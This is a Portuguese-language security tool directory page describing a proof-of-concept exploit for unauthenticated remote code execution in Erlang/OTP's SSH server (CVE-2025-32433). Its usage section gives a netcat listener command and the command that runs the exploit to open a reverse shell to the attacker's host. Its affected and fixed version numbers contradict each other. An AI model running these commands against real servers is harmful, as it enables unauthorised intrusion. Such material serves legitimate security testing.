Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE — PoC mostrando execução remota de código não autenticada no servidor SSH Erlang/OTP. Ao explorar uma falha no manuseio de mensagens do protocolo SSH, um atacante pode executar comandos arbitrários no alvo sem credenciais válidas. | Kitploit
Ferramentas/GitHubGitHub/dollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubdollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce

CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

PoC mostrando execução remota de código não autenticada no servidor SSH Erlang/OTP. Ao explorar uma falha no manuseio de mensagens do protocolo SSH, um atacante pode executar comandos arbitrários no alvo sem credenciais válidas.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
3há 11 mesesAinda não revisado

CVE-2025-32433 - PoC de RCE no SSH do Erlang/OTP

CVE-2025-32433

Visão Geral

PoC demonstrando execução remota de código não autenticada no servidor SSH do Erlang/OTP.
Ao explorar uma falha no tratamento de mensagens do protocolo SSH, um atacante consegue executar comandos arbitrários no alvo sem credenciais válidas.

  • CVE: CVE-2025-32433
  • Pontuação CVSS: 10.0 (Crítico)
  • Versões Afetadas:
    • OTP-27.3.3 e anteriores
    • OTP-26.2.5.11 e anteriores
    • OTP-25.3.2.20 e anteriores

Este problema foi corrigido nas versões OTP-27.3.3, OTP-26.2.5.11 e OTP-25.3.2.20.

Referências

  • Comunicado Unit42
  • Repositório do PoC
  • Entrada no NVD

Uso

Configuração do Listener:

root@kitploit:~
nc -lvnp 1234

alt text Executar o Exploit:

root@kitploit:~
python3 CVE-2025-32433-dbs --rhost <IP_ALVO> --rport <PORTA_ALVO> --lhost <IP_ATACANTE> --lport <PORTA_ATACANTE>
  • --rhost : IP do alvo
  • --rport : Porta SSH do alvo
  • --lhost : Seu IP para a shell reversa
  • --lport : Porta do seu listener

alt text

alt text

Aviso Legal

Este repositório tem finalidade exclusivamente educacional. Não utilize este exploit contra sistemas que não sejam seus ou para os quais não tenha permissão explícita para testar. O uso indevido pode ser ilegal e é estritamente proibido.

Baixar ferramenta